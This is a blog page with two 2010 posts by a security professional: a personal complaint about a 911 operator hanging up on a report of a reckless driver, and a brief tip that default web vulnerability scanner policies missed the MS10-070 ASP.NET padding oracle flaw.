You can't secure what you don't acknowledge.SM

Wednesday, October 6, 2010

911, what's your emergency?

There's a saying when seconds count the police are only minutes away. Maybe yes, maybe no - and like I just experienced, sometimes they may not care at all. Let me explain...

Have you ever been driving down the road and witnessed someone driving completely erratically to the point where you think "WOW, that person is going to cause a wreck, soon." Well, I was out for a leisurely drive in a nearby town and was unfortunately the near-recipient of such a wreck by a gotta-have-it-now-the-world-revolves-around-me-probably-hopped-up-on-meth-idiotic driver....not once but twice! Yep, within a matter of about 4 minutes I nearly got nailed by this person TWO times.

It appeared the older lady (mid to late 60s) in a ~2005 Buick Regal license plate number (ah, nevermind) was either intoxicated OR on a suicide mission. I thought to myself, I've got to call the police and tell them about this woman....I survived her but that doesn't mean everyone else will.

So I called 911 - presumably the City of Cartersville, GA Police 911 center since I was driving right by their headquarters building when I called. I gave them some very basic info, and started to fill the operator in on some more details they probably could've used. Instead, the 911 operator I spoke with said thanks, cut me off, and went on her merry way. Yep, I heard a click....I said uh, eh, ah, oh...and there was nothing. Phone line was dead. Our government at work! I know 911 call centers have to be succinct and not tie up their...and sure, this wasn't an emergency, yet. But come on.

Keep this in mind everywhere you are - in the car, at home, and at work - for at the end of the day the police have no obligation to protect us (really); therefore we must fend for ourselves.

Monday, October 4, 2010

Beware of the oversights w/default policies in Web vuln scanners

I just ran some Web vulnerability scans against an app I'm testing using a couple of default/benign scan policies. Nothing big turned up. I re-ran the scan using a full scan policy that checks for everything and the new MS10-070 ASP.NET padding oracle vulnerability reared its ugly head...BIG difference in the outcome.

Keep this in mind when checking for Web security flaws with your automated scanners and never ever completely rely on their results. You can't live without them but they're only ~50% of the solution.